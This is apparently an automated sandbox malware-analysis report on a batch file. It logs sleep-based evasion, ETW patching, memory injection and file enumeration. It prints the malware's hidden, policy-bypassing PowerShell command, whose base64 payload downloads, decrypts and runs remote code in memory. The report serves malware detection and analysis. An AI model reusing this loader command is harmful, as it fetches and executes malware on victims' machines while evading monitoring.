              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3252
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2277
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 8.4 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 5297 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 4457 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1724Thread sleep count: 5337 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep count: 3181 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 924Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 4559 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 2271 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1824Thread sleep count: 6368 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1960Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076Thread sleep count: 2943 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2184Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1824Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 5906 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4520Thread sleep count: 2448 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6872Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4252Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 4707 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 2171 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2148Thread sleep count: 4208 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep count: 3629 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2268Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep count: 1830 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep count: 2871 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 912Thread sleep count: 3472 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1592Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1600Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4588Thread sleep count: 4137 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4868Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 3252 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1724Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3932Thread sleep count: 2277 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2660Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2208Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00418981 memset,GetSystemInfo,7_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
              Source: powershell.exe, 00000019.00000002.1948275505.0000000008576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rEPv/C9yt8s3PktU5E4UolUEaWenEFR0J7cMKnzrj2kKPQjai23OtzgVSiSj397YBRoWDTp0TISUKgz5zKWUSLRUhjBxgPqCaRQTYOlGC6mM/x21L3L5rqrDLGZMXnPmBhSVbpbA8o04SOJY9ZFKtDrzSFTRqqw22eVtDWYFMAexfj/VC9L5cm1PpRny+gcZVygPQvFbTearpOQkhgFsT00WgmxOCNtglJYIXiPHd/piHBnMx2TiTaIUHgFb1N2resKUvZsznauaixhnQdNO+9MVHED0w0p9JYGV6xlAkxFeNIf9EowEqUawqtQuiOx/1J11XBBc+MCG4glmjQvrg419uykzEFWX55qVXEhZHLU/q1iyQcdvAPpa7PpyO5sKW1ff92qKXARzB8qEd2BFCwIay8ziEk2HFJlMkoty44Gr9smb8+uR3/f4oRZcf5QyzA8OB48J2d6c2E6Fdet3EIo2
              Source: powershell.exe, 0000000F.00000002.1627813047.0000000008888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9ZFKtDrzSFTRqqw22eVtDWYFMAexfj/VC9L5cm1PpRny+gcZVygPQvFbTearpOQkhgFsT00WgmxOCNtglJYIXiPHd/piHBnMx2TiTaIUHgFb1N2resKUvZsznauaixhnQdNO+9MVHED0w0p9JYGV6xlAkxFeNIf9EowEqUaw
              Source: powershell.exe, 00000020.00000002.2100429736.000000000724A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<#
              Source: powershell.exe, 00000025.00000002.2273047650.0000000007308000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
              Source: powershell.exe, 0000000F.00000002.1623727683.00000000073E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfW
              Source: powershell.exe, 0000002A.00000002.2454927477.0000000007B9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
              Source: powershell.exe, 00000019.00000002.1939922208.0000000007504000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
              Source: powershell.exe, 0000003A.00000002.3329140310.0000000007491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11`:
              Source: powershell.exe, 00000020.00000002.2110059731.000000000863D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aWenEFR0J7cMKnzrj2kKPQjai23OtzgVSiSj397YBRoWDTp0TISUKgz5zKWUSLRUhjBxgPqCaRQTYOlGC6mM/x21L3L5rqrDLGZMXnPmBhSVbpbA8o04SOJY9ZFKtDrzSFTRqqw22eVtDWYFMAexfj/VC9L5cm1PpRny+gcZVygPQvFbTearpOQkhgFsT00WgmxOCNtglJYIXiPHd/piHBnMx2TiTaIUHgFb1N2resKUvZsznauaixhnQdNO+9MVHED0w0p9JYGV6xlAkxFeNIf9EowEqUawqtQuiOx/1J11XBBc+MCG4glmjQvrg419uykzEFWX55qVXEhZHLU/q1iyQcdvAPpa7PpyO5sKW1ff92qKXARzB8qEd2BFCwIay8ziEk2HFJlMkoty44Gr9smb8+uR3/f4oRZcf5QyzA8OB48J2d6c2E6Fdet3EIo2
              Source: powershell.exe, 00000014.00000002.1775216793.0000000007425000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2938033307.0000000007719000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.3771499920.000000000748E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: powershell.exe, 0000002F.00000002.2661043439.00000000073E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_8-34070
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,7_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252